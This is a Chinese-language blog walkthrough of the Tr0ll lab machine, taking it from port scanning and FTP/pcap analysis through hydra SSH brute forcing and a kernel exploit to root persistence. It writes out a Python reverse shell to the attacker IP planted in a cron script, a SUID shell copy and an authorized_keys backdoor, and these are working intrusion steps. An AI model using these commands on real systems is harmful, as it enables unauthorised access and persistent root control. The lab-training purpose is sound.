经典靶场实战:从信息收集到提权的全过程

·  阅读 86
经典靶场实战:从信息收集到提权的全过程

前言

本次采用Tr0ll经典项目作为靶场,模拟互联网环境,演示从信息收集到最后提权的全过程。本次实验所涉及到的技术有端口扫描、流量分析、文件分析、hydra爆破、各种反弹shell、稳定shell、计划任务反弹shell(提权),公私钥互碰等一系列基本操作,适合入门不久的初学者练习。

攻击机:192.168.160.3

受害机:192.168.160.7

一、信息收集

1、全端口扫描

nmap -p- 192.168.160.7
复制代码

发现开放21、22、80端口

2、nmap详细扫描

nmap -sS -sV -A -T5 192.168.160.7
复制代码

发现ftp存在默认密码Anonymous

3、登入ftp

使用默认账号密码Anonymous/Anonymous登入ftp

ftp 192.168.160.7

dir查看
get下载
put上传
复制代码

发现存在lol.pcap流量包

【→所有资源关注我,私信回复“资料”获取←】
1、网络安全学习路线
2、电子书籍(白帽子)
3、安全大厂内部视频
4、100份src文档
5、常见安全面试题
6、ctf大赛经典题目解析
7、全套工具包
8、应急响应笔记

4、分析流量包

使用wireshark 分析流量

wireshark lol.pcap
复制代码

右键追踪tcp流

得到信息secret_stuff.txt

追踪第二条tcp流,得到信息sup3rs3cr3tdirlol

经过排查sup3rs3cr3tdirlol是个目录,里面有个roflmao文件

5、分析文件

下载该文件,分析后发现是个32位文件

file roflmao

分析文件信息

exiftool roflmao
binwalk roflmao
strings roflmao
复制代码

得到信息:0x0856BF

发现0x0856BF目录存在信息,将信息做成密码本zhi.txt

Pass.txt里面没啥东西,文件名可能有用

二、暴力破解

1、hydra爆破

使用hydra爆破,将刚才收集的作为账号本,文件名Pass.txt做为密码字段进行ssh爆破

hydra -L zhi.txt -p Pass.txt 192.168.160.7 ssh
复制代码

得到账号密码:overflow、Pass.txt

2、登入ssh

ssh overflow@192.168.160.7

稳定shell
python -c 'import pty;pty.spawn("/bin/bash")'
复制代码

三、提权

1、查看系统版本

uname -a
复制代码

发现是Linux ubuntu 3.13.0

2、搜索提权exp

searchsploit Linux ubuntu 3.13.0

复制到桌面
cp /usr/share/exploitdb/exploits/linux/local/37292.c /root/Desktop/
复制代码

3、查看exp

gedit 37292.c
复制代码

exp里有使用教程

python开启http服务,远程下载

python -m http.server 8520
wget http://192.168.160.3/37292.c
复制代码

四、拓展

提权后发现shell过几分钟就会断开,应该是设置了计划任务

1、查看计划任务

find / -name cronlog 2>/dev/null    ---查看计划任务日志信息
find / -name cleaner.py 2>/dev/null   ---查看文件在哪儿
复制代码

发现计划任务设置每5分钟删除tmp目录下文件,并且没有该计划任务的权限

1、反弹shell

枚举所有可写入可修改的文件

find / -writable 2>/dev/null   ---枚举所有可写入权限的文件
find / -perm -o+w -type f 2> /dev/null | grep /proc -v   ---枚举
复制代码

修改计划任务文件cleaner.py

nano /lib/log/cleaner.py
ctrl+x退出,y保存
复制代码

修改为

#!/usr/bin/python
def con():
	import socket, time,pty, os
	host='192.168.160.3'
	port=2233
	s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
	s.settimeout(10)
	s.connect((host,port))
	os.dup2(s.fileno(),0)
	os.dup2(s.fileno(),1)
	os.dup2(s.fileno(),2)
	os.putenv("HISTFILE",'/dev/null')
	pty.spawn("/bin/bash")
	s.close()
con()
复制代码
nc -lvvp 2233
复制代码

成功回弹root权限

2、创建root可执行程序

修改计划任务

os.system('cp /bin/sh /tmp/zhi')
os.system('chmod u+s /tmp/zhi')
复制代码

3、写入ssh rsa

生成ssh key

ssh-keygen   ---一路空格回车
复制代码

cat id_rsa.pub
复制代码
ssh-rsa 
AAAAB3NzaC1yc2EAAAADAQABAAABgQCeLZfgzSuFUU8hGMMQkqPEho/ikzjqvPQDKpSTXuCalQJNohE5HpFWf/3IaAiNSyXCKB/Fus81X7WL9l6+sBMkkB5DRtbDh8OapsavE6LWNDs0nJJmS3JtE6jmJAkuP/9EuPreUFIwTDw43B1dhSMNygwogAmno2zJ323prOskCkTZOtpxvhwXNjmnhI3FXlkLOReVVZc3sWvm1PUkN8/gZN9WqjVNq9J8Gl7QexU++Jrt7MbWMhx9y8qAQXNVwqohxSW+poQeBDWdyG8= root@kali
复制代码

计划任务写入密钥

mkdir /root/.ssh; chmod 775 .ssh; echo "加上 id_rsa.pub产生的密匙内容上图有例子" >> /root/.ssh/authorized_keys

即

mkdir /root/.ssh; chmod 775 .ssh; echo "ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQCeLZfgzSuFUU8hGMMQkqPEho/ikzjqvPQDKpSTXuCalQJNohE5HpFWf/3IaAii7r0BvJGXQ6Wk/eIrX8IxsCU23jmnigWlQkxwabscxGXs/Ng0a9vLyseI5+PuY9x881NMoi1YIJAoqBnNSyXCKB/Fus81X7WL9l6+sBMkkB5DRtbDh8OapsavE6LWNDs0nJJmS3JtE6jmJAkuP/9EuPreUFIwTDw43B1dhSMNygwogAmno2MKhvaFoSmHzxBX+TG4/FM3jYQrF8A6LTCWSQlo7bChcCvLpDOy7LBqLQy0U+pjLcH/xv105MVqxNpG+szJ323prOskCkTZOtpxvhwXNjmnhI3FXlkLOReVVZc3sWvm1PUkN8/gZN9WqjVNq9J8Gl7QexU++Jrt7MbWMhx9y8qAQXNVwqohxtCQ+qstFm6KzlXei1Yd6vIQLDWyS67rnWGt0caKEBkIengjEwfb5zoImkQFxKYpapqBbH+oGAuzDQk6jSW+poQeBDWdyG8= root@kali" >> /root/.ssh/authorized_keys
复制代码

公私钥互碰,无需输入密码

ssh root@192.168.160.7
复制代码

分类:
代码人生
标签:
收藏成功!
已添加到「」, 点击更改